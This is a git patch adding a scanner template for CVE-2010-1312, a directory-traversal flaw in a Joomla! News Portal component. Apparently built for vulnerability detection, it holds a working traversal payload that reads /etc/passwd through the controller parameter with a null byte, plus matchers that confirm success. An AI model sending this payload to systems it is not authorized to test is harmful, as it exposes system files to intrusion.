From ef9055b4f0169cab9875941759475668361e7d5d Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Sun, 5 Sep 2021 08:55:43 +0700 Subject: [PATCH] Create CVE-2010-1312.yaml --- cves/2010/CVE-2010-1312.yaml | 27 +++++++++++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 cves/2010/CVE-2010-1312.yaml diff --git a/cves/2010/CVE-2010-1312.yaml b/cves/2010/CVE-2010-1312.yaml new file mode 100644 index 0000000000..022a54afd8 --- /dev/null +++ b/cves/2010/CVE-2010-1312.yaml @@ -0,0 +1,27 @@ +id: CVE-2010-1312 + +info: + name: Joomla! Component News Portal 1.5.x - Local File Inclusion + author: daffainfo + severity: high + description: Directory traversal vulnerability in the iJoomla News Portal (com_news_portal) component 1.5.x for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + reference: + - https://www.exploit-db.com/exploits/12077 + - https://www.cvedetails.com/cve/CVE-2010-1312 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_news_portal&controller=../../../../../../../../../../etc/passwd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200